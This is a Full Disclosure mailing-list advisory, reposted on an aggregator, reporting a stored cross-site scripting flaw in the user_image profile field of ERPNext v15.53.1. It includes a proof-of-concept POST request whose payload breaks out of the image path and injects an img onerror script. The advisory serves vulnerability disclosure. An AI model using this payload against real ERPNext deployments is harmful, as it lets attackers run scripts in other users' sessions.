ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
ERPNext v15.53.1版本中存在存储型XSS漏洞,攻击者可通过用户图像字段注入恶意JavaScript代码,在其他用户访问时执行脚本。 2025-6-3 13:2:58 Author: seclists.org(查看原文) 阅读量:13 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Fri, 30 May 2025 23:17:41 -0400

An authenticated user can inject malicious JavaScript into the user_image
field of the profile page using an XSS payload within the file path or HTML
context. This field is rendered without sufficient sanitization, allowing
stored script execution in the context of other authenticated users.


*Proof of Concept:*POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--

profile_info={"user_image":"/private/files/\"><img src=x
onerror=alert('XSS')>fd12cb.jpg"}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path Ron E (Jun 03)

文章来源: https://seclists.org/fulldisclosure/2025/Jun/10
如有侵权请联系:admin#unsafe.sh